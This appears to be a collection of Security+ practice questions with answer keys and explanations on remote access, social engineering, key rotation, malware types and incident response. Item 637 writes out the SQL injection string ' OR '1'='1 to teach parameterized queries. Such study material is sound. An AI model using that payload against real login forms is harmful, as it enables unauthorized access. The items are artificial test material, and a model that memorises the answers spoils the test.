Network engineers need to administer internal switches from home. The company wants encrypted management traffic, strong user verification, and no management ports exposed directly to the internet. Which approach is best?

A.Require a VPN or ZTNA connection with MFA, then allow SSH or HTTPS management only through that protected tunnel.
B.Expose SSH on the internet and rely on key-based authentication alone.
C.Use RDP with port forwarding because it is simpler for remote support.
D.Allow split tunneling without MFA so engineers can reduce latency while working remotely.
AnswerA

A protected remote-access layer keeps management services off the public internet while preserving encryption and strong authentication.

Why this answer

Option A is correct because it enforces encryption (via VPN or ZTNA tunnel), strong user verification (MFA), and network segmentation (no direct internet exposure). SSH or HTTPS management traffic is then allowed only through the protected tunnel, ensuring confidentiality, integrity, and access control. This aligns with the principle of defense in depth for remote network device administration.

Exam trap

The trap here is that candidates may think SSH key-based authentication alone is sufficient for remote access, overlooking the requirement to avoid direct internet exposure and the need for strong user verification like MFA.

How to eliminate wrong answers

Option B is wrong because exposing SSH directly to the internet violates the requirement of no management ports exposed to the internet, and key-based authentication alone does not provide strong user verification (e.g., no MFA). Option C is wrong because RDP is not designed for switch management (switches typically lack RDP support) and port forwarding still exposes the management port to the internet, violating the exposure restriction. Option D is wrong because split tunneling without MFA bypasses the encrypted tunnel requirement and weakens user verification, leaving management traffic potentially exposed and vulnerable to interception.

626
MCQmedium

A help desk technician reviews a voicemail in which the caller claims to be from the security team, says the user will be locked out unless they read back a one-time passcode, and leaves a callback number. What type of attack is this?

A.Smishing, because the attacker is using a text message with a link.
B.Vishing, because the attacker is using voice communication to pressure the user.
C.Baiting, because the attacker is offering a reward to entice the user.
D.Pretexting, because the attacker invented a role and story.
AnswerB

Vishing is voice-based social engineering, including phone calls and voicemail messages that try to pressure the target into revealing information. Requesting a one-time passcode is especially dangerous because it can let an attacker bypass MFA protections. The callback number is often used to appear legitimate and keep the victim engaged long enough to disclose sensitive data.

Why this answer

Option B is correct because vishing (voice phishing) uses voice communication—such as phone calls or voicemails—to trick victims into revealing sensitive information. In this scenario, the attacker leaves a voicemail claiming to be from the security team and pressures the user to read back a one-time passcode, which is a classic vishing tactic that exploits trust and urgency over voice channels.

Exam trap

The trap here is that candidates may confuse vishing with smishing because both involve social engineering over digital communication, but the key differentiator is the medium: voice (voicemail/call) versus text message (SMS).

How to eliminate wrong answers

Option A is wrong because smishing specifically involves SMS text messages, often containing a malicious link, not a voicemail or callback number. Option C is wrong because baiting relies on offering a reward (e.g., free download or USB drive) to entice the victim into an action, not on impersonating authority and creating urgency to extract a passcode.

627
MCQeasy

An employee receives an email that appears to come from the HR team. It says their payroll account will be suspended unless they click a link and sign in within 30 minutes. What type of attack is this most likely?

A.Smishing
B.Phishing
C.Vishing
D.Pretexting
AnswerB

Phishing uses deceptive messages to trick a user into clicking a link, entering credentials, or taking another unsafe action. This email pretends to be from HR, creates urgency, and tries to push the user into signing in on a fake page.

Why this answer

This is a classic phishing attack because the threat actor uses a deceptive email message to trick the recipient into clicking a malicious link and providing sensitive credentials. Phishing specifically refers to social engineering attacks delivered via email, often leveraging urgency and impersonation of a trusted entity like HR to bypass the victim's critical thinking.

Exam trap

The trap here is that candidates often confuse phishing with vishing or smishing because all three involve impersonation and urgency, but the specific delivery vector (email vs. SMS vs. voice call) is the key differentiator the exam expects you to identify.

How to eliminate wrong answers

Option A is wrong because smishing is a social engineering attack delivered via SMS (Short Message Service) text messages, not email. Option C is wrong because vishing (voice phishing) is conducted over voice calls or VoIP, not through an email message. Option D is wrong because pretexting is a social engineering technique where the attacker fabricates a scenario (pretext) to steal information, but it does not inherently involve a phishing link or email; the attack described specifically uses an email with a link, which is the hallmark of phishing.

628
MCQmedium

A company suspects the master encryption key used by a cloud storage service may have been exposed. The data must remain protected if someone later obtains a copy of the old key. What is the best next step?

A.Delete the stored files so the exposed key can no longer be used.
B.Rotate the key and re-encrypt or rewrap the protected data under the new key.
C.Change every user's password because that will also invalidate the exposed encryption key.
D.Increase file compression so the data becomes harder to read.
AnswerB

If a key may be compromised, the secure response is to replace it and move protected data to fresh key material. Rotating the key prevents the old key from being useful going forward, and re-encrypting or rewrapping ensures the data is actually protected by the new key. This reduces the risk that a future attacker can use the leaked key to access stored content.

Why this answer

Key rotation is the correct response because it invalidates the old master encryption key by generating a new one and re-encrypting or rewrapping the protected data under the new key. This ensures that even if an attacker later obtains a copy of the old key, the data remains protected because it is no longer encrypted with that key. In cloud storage services like AWS KMS or Azure Key Vault, this process is typically automated and does not require re-uploading the data.

Exam trap

The trap here is that candidates often confuse key rotation with password changes or data deletion, failing to recognize that encryption key management requires cryptographic operations to re-protect the data, not just administrative actions like deleting files or changing user credentials.

How to eliminate wrong answers

Option A is wrong because deleting the stored files does not address the exposure of the key itself; the data is lost, but the key exposure remains a risk for any future data encrypted with that key, and it is an extreme measure that disrupts business operations. Option C is wrong because user passwords are unrelated to the master encryption key; changing passwords affects authentication but does not change the cryptographic key used to encrypt the data. Option D is wrong because file compression does not alter the encryption key or the ciphertext; it only reduces file size and does not provide any security against an attacker who possesses the old key.

629
Multi-Selectmedium

A security operations center (SOC) analyst is investigating a potential malware outbreak. Which three of the following indicators of compromise (IOCs) would provide the strongest evidence of malicious activity? (Choose three.)

Select 3 answers
.An outbound connection from an internal workstation to a known command-and-control (C2) IP address
.A hash of a file that matches a known malware signature in a threat intelligence feed
.A registry key modification that creates a run key for persistence on a system
.An increase in legitimate web traffic to a corporate website from a new geographic region
.A user reporting a slow computer that started after installing a software update
.A single failed login attempt on a user account from an internal IP address

Why this answer

An outbound connection to a known C2 IP address is a strong indicator of compromise because it suggests the infected host is communicating with an attacker-controlled server to receive commands or exfiltrate data. This is a direct network-level IOC that is rarely seen in legitimate traffic, especially when the IP is listed in threat intelligence feeds as malicious.

Exam trap

Cisco often tests the distinction between anecdotal user reports and objective technical IOCs, where candidates mistakenly treat a user complaint or a single benign event as strong evidence of compromise.

630
MCQmedium

A user reports receiving repeated MFA push requests even though they are not logging in. Later, someone calls and claims to be IT, asking the user to approve one prompt so support can finish a password reset. Which control would best reduce the success of this attack?

A.Increase password complexity requirements
B.Use phishing-resistant MFA with number matching or hardware security keys
C.Shorten the screen-lock timeout on user devices
D.Allow users to approve any MFA prompt sent during business hours
AnswerB

These controls require stronger user verification and reduce the chance that a simple push approval will defeat MFA.

Why this answer

Option B is correct because phishing-resistant MFA, such as number matching or hardware security keys (e.g., FIDO2/WebAuthn), prevents an attacker from tricking the user into approving a fraudulent push request. Number matching requires the user to enter a number displayed on the login screen into the MFA prompt, ensuring the approval is tied to an actual authentication attempt. Hardware security keys use cryptographic challenge-response, making it impossible for an attacker to replay or intercept the authentication factor.

Exam trap

The trap here is that candidates often confuse MFA fatigue with password-based attacks and incorrectly choose password complexity (A) or screen-lock timeout (C), failing to recognize that the core vulnerability is the user's ability to approve a push without verifying the context.

How to eliminate wrong answers

Option A is wrong because increasing password complexity does not address MFA fatigue or social engineering; the attacker is already bypassing the password by exploiting the MFA approval process. Option C is wrong because shortening the screen-lock timeout only reduces the risk of unauthorized physical access to an unlocked device, but does not prevent the user from approving a fraudulent MFA prompt on their own device. Option D is wrong because allowing users to approve any MFA prompt during business hours directly enables the attack; it removes the user's discretion and encourages blind approval, which is exactly what the attacker is exploiting.

631
MCQmedium

During an incident, a server administrator needs elevated access to production logs for exactly two hours after manager approval. The organization does not want standing privileged accounts. Which solution is the best fit?

A.Add the administrator to a permanent domain admin group so access is always available.
B.Use just-in-time privileged access through a privileged access management workflow.
C.Create a shared administrator account for the incident team and change the password afterward.
D.Grant access by sending the administrator a VPN profile with broader network reach.
AnswerB

Just-in-time access is ideal when elevation should be temporary, approved, and tightly controlled. A privileged access management workflow can grant the needed permissions for a limited window, automatically revoke them when time expires, and preserve logs for accountability. This reduces the attack surface compared with always-on admin rights while still letting the team respond quickly during an incident.

Why this answer

Just-in-time (JIT) privileged access through a Privileged Access Management (PAM) workflow is the best fit because it grants the administrator elevated permissions for exactly two hours, then automatically revokes them. This aligns with the requirement for time-limited access without maintaining standing privileged accounts, reducing the attack surface and ensuring compliance with the principle of least privilege.

Exam trap

The trap here is that candidates may confuse network-level access (VPN) with privileged access management, or assume a shared account with password rotation is sufficient, overlooking the need for time-bound, auditable, and non-repudiable elevation without standing privileges.

How to eliminate wrong answers

Option A is wrong because adding the administrator to a permanent domain admin group creates a standing privileged account, which the organization explicitly wants to avoid, and provides continuous elevated access rather than time-limited access. Option C is wrong because creating a shared administrator account violates the principle of non-repudiation and auditability, as actions cannot be attributed to a specific individual, and changing the password afterward does not enforce a precise two-hour access window. Option D is wrong because sending a VPN profile with broader network reach only expands network-level access, not privileged access to production logs, and does not provide time-bound elevation or granular control over log permissions.

632
MCQhard

Based on the exhibit, which document type should be updated to make the approval and retention requirements mandatory across the organization?

A.Guideline, because it provides flexible advice without requiring enforcement.
B.Procedure, because it lists the exact steps the help desk follows.
C.Policy, because it sets mandatory rules that apply organization-wide.
D.Architecture diagram, because it shows where documents are stored.
AnswerC

A policy is the right choice because leadership wants the approval and retention expectations to be mandatory, consistent, and auditable across departments. The exhibit shows informal language such as 'should' and 'if time allows,' which is too weak for a control that must be enforced. Policy language establishes the required rule before procedures document how to follow it.

Why this answer

A policy document is the correct choice because it establishes mandatory rules that apply organization-wide, making approval and retention requirements enforceable across all departments. Unlike guidelines or procedures, policies are authoritative and require compliance, which is essential for standardizing security controls like data retention periods.

Exam trap

The trap here is confusing a policy (mandatory, organization-wide) with a guideline (advisory) or procedure (task-specific), leading candidates to pick a document type that lacks enforcement authority.

How to eliminate wrong answers

Option A is wrong because a guideline provides flexible advice or recommendations, not mandatory rules, so it cannot enforce approval or retention requirements. Option B is wrong because a procedure lists specific step-by-step instructions for a task (e.g., help desk ticket handling), but it does not set organization-wide mandatory policies. Option D is wrong because an architecture diagram visually represents system components and data flow, not enforceable rules or retention mandates.

633
MCQhard

A user database is stolen from a SaaS portal. Investigators discover the password column contains the same value for every user who chose "Summer2026!", and an attacker could use precomputed tables to crack weak passwords quickly. Which change best addresses both the repeated-value issue and rainbow-table risk?

A.Encrypt all stored passwords with AES and keep one shared key
B.Use SHA-256 without a salt
C.Store each password with a unique salt and an adaptive hash such as bcrypt or Argon2
D.Add a digital signature to each password record
AnswerC

A unique salt prevents two users with the same password from producing the same stored value, which makes identical passwords harder to spot. Salting also defeats rainbow-table attacks because precomputed hashes no longer match. An adaptive hash adds deliberate computational cost, slowing offline cracking after a breach. Together, these are the standard protections for password storage.

Why this answer

Option C is correct because using a unique salt per password ensures that even if two users choose the same password (e.g., 'Summer2026!'), their stored hashes will differ, eliminating the repeated-value issue. Additionally, adaptive hash functions like bcrypt or Argon2 are computationally expensive, making precomputed rainbow tables infeasible even if the salts were known, as each guess requires re-hashing with the specific salt.

Exam trap

CompTIA often tests the misconception that encryption (A) or a stronger hash like SHA-256 (B) is sufficient for password storage, but the trap is that encryption is reversible and unsalted hashes are still vulnerable to rainbow tables, whereas the correct answer requires both salting and an adaptive, slow hash function.

How to eliminate wrong answers

Option A is wrong because encrypting passwords with AES and a shared key does not prevent identical passwords from producing identical ciphertexts (the repeated-value issue remains), and if the key is compromised, all passwords are exposed; encryption is reversible, unlike hashing. Option B is wrong because SHA-256 without a salt produces the same hash for the same password, directly causing the repeated-value issue, and unsalted hashes are trivially vulnerable to rainbow-table attacks. Option D is wrong because adding a digital signature to each password record does nothing to address identical password hashes or rainbow-table risks; signatures verify integrity/authenticity, not protect against precomputation attacks.

634
Multi-Selecthard

EDR on a finance workstation shows Outlook launching mshta.exe, followed by a scheduled task named UpdateSvc_91 and repeated HTTPS beacons to a newly registered domain. The user is still working and has not rebooted. Which two telemetry sources would best help the analyst confirm the initial execution path and determine whether the host has communicated with other suspicious infrastructure? Select two.

Select 2 answers
A.EDR process tree and parent-child execution telemetry, because it reveals the original application that launched the script host.
B.Proxy or secure web gateway logs, because they show outbound destinations, categories, and repeated beacons to external sites.
C.Spooler service logs, because mshta.exe commonly prints documents before starting network activity.
D.RAID controller logs, because they show whether the workstation’s storage hardware is failing.
E.NTP synchronization logs, because time drift is the most likely cause of the alert.
AnswersA, B

The process tree shows the execution chain from Outlook to mshta.exe and any child processes that followed. That is the best way to confirm whether the attachment or message initiated the suspicious activity. It also helps distinguish user-driven execution from unrelated background activity.

Why this answer

Option A is correct because EDR process tree and parent-child execution telemetry directly reveal the initial execution path, showing that Outlook launched mshta.exe. This allows the analyst to trace the attack back to the original vector (e.g., a malicious email attachment or link) and understand how the script host was invoked, which is critical for identifying the root cause of the compromise.

Exam trap

The trap here is that candidates may overlook the importance of parent-child process telemetry and instead focus on irrelevant logs like Spooler or RAID, failing to recognize that the initial execution path is the key to understanding the attack vector.

635
MCQmedium

An organization is redesigning access for its HR portal. HR staff need to update employee records, managers need to approve leave requests, and payroll staff need access to salary data, but no single user should receive all of those permissions by default. What is the best access model?

A.Create separate roles for HR, managers, and payroll, and grant only the permissions needed for each job function.
B.Assign everyone the same portal permissions to simplify administration.
C.Give every manager full HR and payroll access so approvals are faster.
D.Use one shared administrator account for all HR actions to keep audits simple.
AnswerA

This follows role-based access control and least privilege. Each role gets only the permissions required for its work, which reduces the chance of accidental or unauthorized access across sensitive HR functions.

Why this answer

Option A is correct because Role-Based Access Control (RBAC) assigns permissions based on job functions, ensuring that HR staff, managers, and payroll personnel receive only the privileges necessary for their roles. This enforces the principle of least privilege and prevents any single user from inheriting all permissions by default, which aligns with the organization's security requirement.

Exam trap

The trap here is that candidates may confuse RBAC with simpler models like DAC or MAC, or assume that convenience (e.g., faster approvals) justifies overriding least privilege, but the exam emphasizes that role separation and minimal permissions are mandatory for secure access design.

How to eliminate wrong answers

Option B is wrong because assigning everyone the same portal permissions violates the principle of least privilege, granting excessive access to users who do not need it and increasing the risk of unauthorized data exposure or modification. Option C is wrong because giving every manager full HR and payroll access bypasses role separation, allowing managers to view salary data and update employee records without need, which could lead to privilege escalation and compliance violations. Option D is wrong because using one shared administrator account eliminates accountability and audit trails, making it impossible to attribute actions to specific users and violating non-repudiation principles.

636
MCQmedium

EDR flags a workstation after a word processor launches encoded PowerShell and the host begins contacting a rare domain over HTTPS. The user is still active. What is the best containment action from the EDR console?

A.Isolate the endpoint from the network while keeping it powered on.
B.Delete the suspicious PowerShell process from the console and close the alert.
C.Reimage the workstation immediately to return it to a clean state.
D.Power the workstation off and disconnect the SSD to preserve data.
AnswerA

This is the best containment step because it stops the suspected malware from communicating outward or moving laterally, while preserving the live system for follow-up investigation. Keeping the machine powered on protects volatile evidence such as memory, processes, and active connections. EDR isolation is especially useful when the user is still logged in and the host may still contain useful artifacts that would be lost by immediate shutdown.

Why this answer

Isolating the endpoint from the network while keeping it powered on is the best containment action because it immediately cuts off the command-and-control (C2) communication over HTTPS to the rare domain, preventing further data exfiltration or lateral movement, while preserving volatile memory and running processes for forensic analysis. This aligns with incident response best practices where containment must prioritize stopping the threat without destroying evidence.

Exam trap

The trap here is that candidates often choose to kill the process or power off the system, mistakenly believing that stopping the immediate malicious activity is sufficient, without understanding that containment must preserve forensic evidence and prevent re-infection or lateral movement.

How to eliminate wrong answers

Option B is wrong because deleting the suspicious PowerShell process from the console does not remove the underlying malware or persistence mechanism, and the endpoint remains connected to the network, allowing the attacker to re-establish C2 or execute additional payloads. Option C is wrong because reimaging the workstation destroys all forensic evidence, including volatile memory, logs, and artifacts that could reveal the attack vector, scope, and indicators of compromise, which is premature before a proper investigation. Option D is wrong because powering the workstation off and disconnecting the SSD destroys volatile memory (e.g., running processes, network connections, encryption keys) that are critical for understanding the attack, and it prevents live response actions such as memory acquisition or process analysis.

637
MCQeasy

During testing, a login form returns all user records when the tester enters ' OR '1'='1 in a username field. What is the best fix for this issue?

A.Hide database error messages from the login page only
B.Use parameterized queries or prepared statements
C.Require users to change passwords more often
D.Move the login page to a different URL
AnswerB

Parameterized queries separate user input from SQL commands, which prevents the database from treating input as executable code.

Why this answer

The SQL injection attack ' OR '1'='1 bypasses authentication by always evaluating to true, returning all user records. Parameterized queries (prepared statements) separate SQL logic from user input, preventing the injected string from altering the query structure. This is the industry-standard mitigation for SQL injection vulnerabilities.

Exam trap

The trap here is that candidates often choose hiding error messages (Option A) because they confuse symptom masking with root-cause remediation, but the exam tests the principle that input validation and parameterized queries are the only reliable fix for SQL injection.

How to eliminate wrong answers

Option A is wrong because hiding error messages is a defense-in-depth measure that does not prevent the SQL injection itself; the attack still succeeds even if errors are hidden. Option C is wrong because password rotation policies do not address the root cause of SQL injection; they only reduce the window of compromised credentials. Option D is wrong because moving the login page to a different URL does not fix the vulnerability; the same injection would work on the new URL if the code remains unchanged.

638
MCQhard

Based on the exhibit, which improvement best addresses the biggest cryptographic risk? TLS inventory: - edge-vpn01 and edge-vpn02 present the same certificate and private key - private key file stored in a shared SMB folder - admins copy the key manually during maintenance - compromise of either gateway would expose the file path to the same share

A.Place the private key in an HSM or cloud key vault and issue unique keys or certificates per gateway.
B.Increase the certificate expiration to five years to reduce renewal work.
C.Keep copying the same key everywhere so failover is easier to manage.
D.Disable certificate validation to avoid user-facing outages.
AnswerA

An HSM or vault protects the key from export, and unique keys reduce the impact if one gateway is compromised.

Why this answer

Option A is correct because the biggest cryptographic risk is the shared private key stored in an SMB share, which violates the principle of least privilege and creates a single point of compromise. Using a Hardware Security Module (HSM) or cloud key vault ensures the private key is never exposed in plaintext, and issuing unique keys per gateway eliminates the risk that compromising one gateway exposes the key for all others. This directly addresses the core issue of key confidentiality and isolation.

Exam trap

The trap here is that candidates may think certificate expiration or failover convenience are the primary concerns, when the real risk is the shared private key's exposure and lack of isolation, which undermines the entire TLS trust model.

How to eliminate wrong answers

Option B is wrong because increasing certificate expiration to five years does not address the fundamental risk of a shared, exposed private key; it actually increases the window of exposure if the key is compromised. Option C is wrong because continuing to copy the same key everywhere perpetuates the insecure practice of key sharing, making failover easier at the cost of catastrophic security failure if any gateway is breached. Option D is wrong because disabling certificate validation removes the entire security benefit of TLS, allowing man-in-the-middle attacks and completely undermining confidentiality and integrity.

639
MCQeasy

A file server suddenly renames documents, creates ransom notes, and users can no longer open their files. Which malware type is most likely involved?

A.Spyware
B.Ransomware
C.Rootkit
D.Worm
AnswerB

Ransomware encrypts or blocks access to data and demands payment for recovery. Renaming files and leaving ransom notes are classic signs, especially when users can no longer open shared documents.

Why this answer

Ransomware is the correct answer because it specifically encrypts files and demands payment for decryption. The symptoms—documents being renamed, ransom notes appearing, and users losing access to their files—are classic indicators of ransomware activity, which typically uses strong encryption algorithms like AES or RSA to lock files.

Exam trap

The trap here is that candidates may confuse the file-renaming and note-creation behavior with a logic bomb or virus, but the core differentiator is the extortion demand and encryption-based access loss, which is unique to ransomware.

How to eliminate wrong answers

Option A is wrong because spyware is designed to covertly gather information (e.g., keystrokes, browsing habits) without altering or encrypting files; it does not rename documents or create ransom notes. Option C is wrong because a rootkit provides persistent, stealthy access to a system by hiding its presence (e.g., hooking system calls or modifying kernel data structures), but it does not directly rename files or demand ransoms.

640
Multi-Selectmedium

An EDR alert shows suspicious PowerShell activity on a remote employee laptop, and the user is still logged in to cloud applications. Which two response actions are best if the device is believed to be actively compromised? Select two.

Select 2 answers
A.Isolate the endpoint through the EDR tool or quarantine its network access.
B.Collect a live response package or volatile data before cleanup begins.
C.Power off the laptop immediately to stop the activity as fast as possible.
D.Wait until the user returns the laptop to the office for physical inspection.
E.Remove the EDR agent so the attacker cannot detect the investigation.
AnswersA, B

Network isolation is the fastest way to stop additional attacker communication, lateral movement, and command execution from the compromised laptop. It contains the incident while preserving the system state for investigation. EDR quarantine is particularly useful for remote devices because it can be applied without physical access to the endpoint.

Why this answer

Option A is correct because isolating the endpoint via the EDR tool or quarantining its network access immediately stops the attacker's ability to communicate with command-and-control servers, preventing lateral movement and further data exfiltration. This containment action is a critical first step in incident response for an actively compromised device, as it preserves the integrity of the investigation while halting malicious activity.

Exam trap

The trap here is that candidates confuse 'stopping the activity' with 'powering off the device,' failing to recognize that volatile data collection must precede any shutdown to preserve forensic evidence.

641
MCQeasy

A help desk team wants guest Wi-Fi users to access only the internet and nothing on the internal corporate network. Which control should the network team implement at the wireless edge?

A.A single shared password for all guest users
B.An ACL or firewall rule set that blocks guest network access to internal subnets
C.A stronger DNS server
D.A longer Wi-Fi passphrase rotated monthly
AnswerB

An ACL or firewall rule can explicitly allow internet access while denying routing to internal ranges.

Why this answer

To prevent guest Wi-Fi users from accessing the internal corporate network while allowing internet access, the network team must implement an ACL or firewall rule set at the wireless edge. This control explicitly blocks traffic from the guest VLAN/subnet to internal subnets (e.g., 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16) while permitting outbound traffic to the internet. This is a fundamental network segmentation technique that enforces the principle of least privilege at Layer 3/4.

Exam trap

The trap here is that candidates confuse authentication controls (passwords, passphrase rotation) with network access controls (ACLs, firewall rules), assuming that a strong password or DNS server can prevent lateral movement, when in fact only explicit Layer 3/4 filtering at the edge can enforce network segmentation.

How to eliminate wrong answers

Option A is wrong because a single shared password for all guest users does not restrict network access; it only provides authentication to the SSID, and without ACLs, guests could still reach internal resources. Option C is wrong because a stronger DNS server (e.g., using DNSSEC or a public resolver) does not block traffic to internal subnets; it only improves name resolution security and does not enforce network segmentation. Option D is wrong because a longer Wi-Fi passphrase rotated monthly improves authentication strength but does not control which networks a guest can reach once connected; it is a credential policy, not an access control mechanism.

642
MCQeasy

A small company is publishing an internal website to the internet. The security team wants the web server reachable from the internet while keeping the database and file share isolated from direct internet access. Which design is best?

A.Place the web server and database on the same flat internal network behind the firewall.
B.Place the web server in a DMZ and keep the database and file share on a private internal subnet.
C.Place the database in the DMZ and keep the web server on the internal user VLAN.
D.Use a VPN for all users and keep every server on the same subnet.
AnswerB

This is the best design because the internet-facing system is isolated in a DMZ, while sensitive back-end systems stay off the public path. Traffic can be tightly filtered so only the required web-to-database communication is allowed. That reduces exposure if the web server is compromised.

Why this answer

Option B is correct because it implements a DMZ architecture where the web server is placed in a publicly accessible network segment, while the database and file share reside on a private internal subnet. This design ensures that even if the web server is compromised, an attacker cannot directly access the internal resources because firewall rules restrict inbound traffic to only the DMZ and block any initiated connections from the DMZ to the internal network. This follows the principle of defense in depth and network segmentation as recommended by CompTIA for securing multi-tier applications.

Exam trap

The trap here is that candidates often confuse a DMZ as a place to put all servers that need internet access, but the correct design isolates only the front-end web server in the DMZ while keeping backend services like databases and file shares on a separate internal subnet to prevent direct exposure.

How to eliminate wrong answers

Option A is wrong because placing the web server and database on the same flat internal network behind the firewall exposes the database to direct internet traffic if the web server is compromised, violating the principle of least privilege and network segmentation. Option C is wrong because placing the database in the DMZ exposes it directly to the internet, which defeats the purpose of isolating sensitive data; the web server should be the only component reachable from the internet, with the database kept on a private subnet. Option D is wrong because using a VPN for all users and keeping every server on the same subnet eliminates network segmentation entirely, meaning that if any server is breached, all resources including the database and file share are immediately accessible, and VPN access does not prevent lateral movement within the same subnet.

643
MCQmedium

A security analyst is reviewing the perimeter firewall logs. The analyst observes repeated TCP SYN packets from a single external IP address (203.0.113.50) to multiple internal IP addresses on TCP port 3389. The packets are sent with a consistent 50-millisecond interval. There are no subsequent SYN-ACK or RST packets from the internal hosts in the logs. The analyst suspects this is a reconnaissance scan. Which of the following additional log sources would provide the most definitive evidence to confirm this suspicion?

A.DNS query logs from the internal DNS server
B.Web proxy logs from the corporate proxy server
C.Intrusion detection system (IDS) logs from a network-based IDS placed behind the firewall
D.VPN gateway authentication logs
AnswerC

A network-based IDS monitors all traffic and uses signatures to detect reconnaissance activities such as port scans. The IDS logs would provide an alert with the signature name (e.g., 'TCP Port Scan') and details about the source IP and targeted hosts, confirming the scan.

Why this answer

Option C is correct because a network-based IDS placed behind the firewall can inspect the full packet payload and detect the specific pattern of TCP SYN packets without corresponding SYN-ACK or RST responses, which is characteristic of a SYN scan (a type of reconnaissance scan). The IDS can correlate the consistent 50-millisecond interval and the targeting of TCP port 3389 (RDP) across multiple internal IPs, providing definitive evidence of scanning behavior that firewall logs alone cannot confirm due to lack of session completion.

Exam trap

The trap here is that candidates may think firewall logs alone are sufficient to confirm a scan, but they miss that an IDS provides deeper packet inspection and pattern correlation that definitively identifies reconnaissance behavior, especially when the firewall drops the packets before they reach internal hosts.

How to eliminate wrong answers

Option A is wrong because DNS query logs would only show domain name resolution requests, not TCP SYN packets or port scanning activity; the attacker is using raw IP addresses (203.0.113.50) and targeting TCP port 3389, which does not involve DNS lookups. Option B is wrong because web proxy logs capture HTTP/HTTPS traffic (typically TCP ports 80/443) and would not record direct TCP SYN packets to port 3389 (RDP), as RDP traffic bypasses the proxy unless explicitly routed through it, which is uncommon.

644
MCQmedium

An EDR console shows PowerShell launching from a scheduled task, decoding a command from memory, and spawning rundll32.exe. No suspicious executable is written to disk, and the activity stops when the process ends. Which threat best fits this behavior?

A.Trojan downloader
B.Fileless malware
C.Rootkit
D.Worm
AnswerB

Fileless malware executes primarily in memory and often uses trusted tools like PowerShell.

Why this answer

The behavior describes PowerShell decoding a command from memory and spawning rundll32.exe without writing any executable to disk, which is the hallmark of fileless malware. Fileless malware operates entirely in memory, leveraging legitimate system tools (like PowerShell and rundll32) to execute malicious code, and it leaves no persistent file on the filesystem, so activity ceases when the process ends.

Exam trap

CompTIA often tests the misconception that any malware using PowerShell must be a Trojan downloader, but the key differentiator here is the absence of a file written to disk and the memory-only execution, which points directly to fileless malware.

How to eliminate wrong answers

Option A is wrong because a Trojan downloader typically writes a malicious executable to disk and then downloads additional payloads, but here no executable is written to disk. Option C is wrong because a rootkit is designed to hide its presence and maintain persistent kernel-level access, often by modifying system files or drivers, whereas this threat is ephemeral and runs only in user-mode memory without persistence. Option D is wrong because a worm self-replicates across networks to infect other systems, usually by copying itself to remote locations, but this threat does not exhibit self-propagation or network-based replication.

645
MCQmedium

A Linux operations team needs to run a nightly script that restarts one service and archives its logs on 60 servers. Security does not want an administrator to log in interactively, and the script should have only the permissions needed for that job. What is the best approach?

A.Use the root account so the job never fails.
B.Create a dedicated service account with only the delegated rights needed, and run the script as a scheduled job.
C.Store an administrator's SSH key inside the script.
D.Have an operator log in and run the commands manually each night.
AnswerB

A dedicated noninteractive account supports automation while keeping permissions tightly scoped to the task. The account can be granted only the ability to restart the specific service and write the required log archive location, rather than full administrator access. Scheduling the job also makes the activity repeatable and auditable. This approach supports least privilege, reduces human error, and avoids interactive logons on every server.

Why this answer

Option B is correct because it follows the principle of least privilege by creating a dedicated service account with only the specific rights needed to restart the service and archive logs. Running the script as a scheduled job (e.g., via cron) eliminates the need for interactive login, satisfying the security requirement. This approach minimizes the attack surface and ensures the job runs automatically without exposing administrative credentials.

Exam trap

The trap here is that candidates often assume root is necessary for system service management, but SY0-701 tests the principle of least privilege and the ability to delegate specific rights via service accounts and sudoers policies.

How to eliminate wrong answers

Option A is wrong because using the root account grants unrestricted superuser privileges, violating the principle of least privilege and increasing the risk of catastrophic errors or compromise. Option C is wrong because storing an administrator's SSH key inside the script exposes the private key to anyone who can read the script, creating a credential theft vulnerability and violating secure key management practices. Option D is wrong because requiring an operator to log in manually each night introduces human error, inconsistency, and violates the security policy that prohibits interactive login.

646
MCQmedium

A vulnerability dashboard shows four new findings. Which one should be remediated first by the operations team? - A low-severity issue on an offline lab VM - A medium-severity issue on a payroll server with no known exploit - A critical issue on an internet-facing web server with an available exploit - A high-severity issue on a test workstation that is not domain joined

A.The low-severity issue on the offline lab VM.
B.The medium-severity issue on the payroll server with no known exploit.
C.The critical issue on the internet-facing web server with an available exploit.
D.The high-severity issue on the test workstation that is not domain joined.
AnswerC

This combines high severity, public exposure, and active exploitability, making it the highest-priority risk.

Why this answer

The critical issue on the internet-facing web server with an available exploit should be remediated first because it combines the highest severity (critical) with an active, exploitable vulnerability on an asset exposed to the public internet. In vulnerability management, remediation priority is determined by risk, which is a function of severity, exploitability, and asset exposure. An internet-facing web server with a known exploit represents an immediate threat that can be remotely compromised, unlike the other findings which are on isolated or less critical systems.

Exam trap

CompTIA often tests the principle that severity alone does not determine priority; candidates must consider exploitability and asset exposure, and the trap here is assuming a high-severity issue on any asset (like a test workstation) should be fixed before a critical issue on an internet-facing server, ignoring that the test workstation is isolated and not domain-joined, reducing its risk profile.

How to eliminate wrong answers

Option A is wrong because a low-severity issue on an offline lab VM poses minimal risk; the VM is not connected to the network, so exploitation is virtually impossible and remediation can be deferred. Option B is wrong because a medium-severity issue on a payroll server with no known exploit is less urgent; without an available exploit, the likelihood of successful attack is low, and the server, while sensitive, is not directly exposed to the internet. Option D is wrong because a high-severity issue on a test workstation that is not domain joined is isolated from the production domain and likely not accessible from the internet, reducing the attack surface and urgency compared to a critical, exploitable internet-facing server.

647
MCQhard

After a suspected compromise, a server's local tools report sshd listening on port 22, but netstat and the EDR console fail to show the process that owns the socket. A reboot does not remove the issue, and firmware integrity checks pass. Which malware type is most likely installed?

A.Spyware, because hidden software is often used to collect credentials and data.
B.Rootkit, because it is designed to hide processes, drivers, or sockets from normal security tools.
C.Ransomware, because the server remains operational while still hiding evidence.
D.Logic bomb, because the issue persists after reboot and could trigger later.
AnswerB

Rootkit is the best answer because the core clue is stealth: the service exists, but common tools cannot attribute the socket to a process. That suggests kernel- or driver-level concealment rather than a normal user-space infection. The persistence after reboot further supports a deeply embedded implant that survives simple cleanup attempts.

Why this answer

Option B is correct because a rootkit is specifically designed to hide its presence from the operating system and security tools by intercepting system calls (e.g., those used by netstat and EDR) to conceal processes, drivers, and network sockets. The persistence after reboot and clean firmware integrity checks indicate the rootkit is installed at the kernel or boot level, bypassing user-mode detection.

Exam trap

The trap here is that candidates may confuse persistence with logic bombs or assume that any hidden software is spyware, but the key technical indicator is the ability to hide a socket from netstat and EDR while surviving reboot, which is a hallmark of kernel-level rootkits.

How to eliminate wrong answers

